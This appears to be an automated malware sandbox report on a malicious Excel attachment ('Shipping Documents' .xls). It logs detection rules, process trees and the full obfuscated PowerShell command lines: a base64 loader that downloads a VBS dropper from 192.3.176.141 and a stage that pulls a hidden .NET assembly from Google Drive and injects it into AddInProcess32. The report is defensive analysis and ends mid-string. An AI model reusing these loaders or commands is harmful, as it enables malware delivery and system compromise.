        Source: Process Memory Space: powershell.exe PID: 4000, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 3560, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLS@34/43@9/7
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\A4230000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR820A.tmpJump to behavior
        Source: Shipping Documents WMLREF115900.xlsOLE indicator, Workbook stream: true
        Source: A4230000.0.drOLE indicator, Workbook stream: true
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.o.......o..............................................................3......x.b.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................o.....}..w......o......................1......(.P.....................x.b.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................o.......o.....}..w.............................1......(.P..............3......................p.4.............Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................Jk....}..w....p.4.....\.......................(.P.....................h...............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p.4.....}..w............ +q.......Jk......p.....(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................Jk....}..w....p.4.....\.......................(.P.....................h...............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p.4.....}..w............ +q.......Jk......p.....(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1. +q.......Jk......p.....(.P............................. .......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .D.E.v.I.C.e.c.r.E.d.e.n.t.i.a.L.d.e.P.l.O.Y.M.e.n.t...E.x.E.........................@.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........................@.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p.4.....}..w............ +q.......Jk......p.....(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................p.4.....}..w............ +q.......Jk......p.....(.P.............................l.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......p.4.....}..w............ +q.......Jk......p.....(.P.....................................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...o.....}..w.............................1......(.P..............3.......................{5.............Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................o.....}..w......o......................1......(.P.....P.......X.......................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.o.......o.....P.......................P.......X........................3......................P...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................o.....}..w......o......................1......(.P.............\.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................o.......o.....}..w.............................1......(.P..............3......................P...............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w....P.......\.......................(.P.............\.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................P.......}..w............@.X........l......W.....(.P.............\.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w....P.......\.......................(.P.............\.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................P.......}..w............@.X........l......W.....(.P.............\.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....x.......N.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.@.X........l......W.....(.P.............\.......x....... .......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .D.E.v.I.C.e.c.r.E.d.e.n.t.i.a.L.d.e.P.l.O.Y.M.e.n.t...E.x.E.........\.......x.......@.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........\.......x.......@.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................P.......}..w............@.X........l......W.....(.P.............\.......................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...x.......N.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................P.......}..w............@.X........l......W.....(.P.............\...............l.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......P.......}..w............@.X........l......W.....(.P.............\.......x...............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...o.....}..w.............................1......(.P..............3......................`2..............
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................o.....}..w......o......................1......(.P.....................................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..#.....................................`2......}..w............8.......8.......@"......(.P.......................#.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................M.Jk....}..w....`2......\.......................(.P.....................................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.8.1.......Jk......y.....(.P.............................$.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................M.Jk....}..w....`2......\.......................(.P.....................................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..#.....................................`2......}..w............@eh.......Jk......y.....(.P.......................#.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..#.....................................`2......}..w............@eh.......Jk......y.....(.P.......................#.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..#.....................................`2......}..w............@eh.......Jk......y.....(.P.......................#.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..#.....................................`2......}..w............@eh.......Jk......y.....(.P.......................#.....X.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......`2......}..w............@eh.......Jk......y.....(.P.....................................................
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: Shipping Documents WMLREF115900.xlsVirustotal: Detection: 25%
        Source: Shipping Documents WMLREF115900.xlsReversingLabs: Detection: 21%
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A69.tmp" "c:\Users\user\AppData\Local\Temp\41k31je4\CSC1CC2DACCE81D4F99A1AD504B85F71256.TMP"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FC2.tmp" "c:\Users\user\AppData\Local\Temp\sblybu2m\CSCFEB4FC09456049919CFF236451FA82A.TMP"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMF